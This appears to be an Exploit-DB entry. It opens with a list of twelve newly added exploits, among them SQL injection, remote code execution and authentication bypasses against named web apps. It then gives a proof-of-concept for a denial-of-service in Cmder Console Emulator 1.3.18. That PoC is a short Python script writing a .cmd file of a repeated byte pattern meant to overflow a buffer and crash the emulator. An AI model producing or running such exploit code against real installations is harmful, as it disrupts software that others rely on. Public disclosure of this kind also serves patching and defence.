
12 changes to exploits/shellcodes Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC) IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated) Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated) django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS) Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated) Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation Simple Online College Entrance Exam System 1.0 - Account Takeover Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection Online Enrollment Management System 1.0 - Authentication Bypass Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass Loan Management System 1.0 - SQLi Authentication Bypass
24 lines
No EOL
895 B
Text
24 lines
No EOL
895 B
Text
# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC)
|
|
# Date: 2021-10-07
|
|
# Exploit Author: Aryan Chehreghani
|
|
# Vendor Homepage: https://cmder.net
|
|
# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
|
|
# Version: v1.3.18
|
|
# Tested on: Windows 10
|
|
|
|
# [About - Cmder Console Emulator] :
|
|
|
|
#Cmder is a software package created over absence of usable console emulator on Windows.
|
|
#It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.
|
|
|
|
# [Security Issue] :
|
|
|
|
#equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition.
|
|
#E.g λ cmder.cmd
|
|
|
|
# [POC] :
|
|
|
|
PAYLOAD=chr(235) + "\\CMDER"
|
|
PAYLOAD = PAYLOAD * 3000
|
|
with open("cmder.cmd", "w") as f:
|
|
f.write(PAYLOAD) |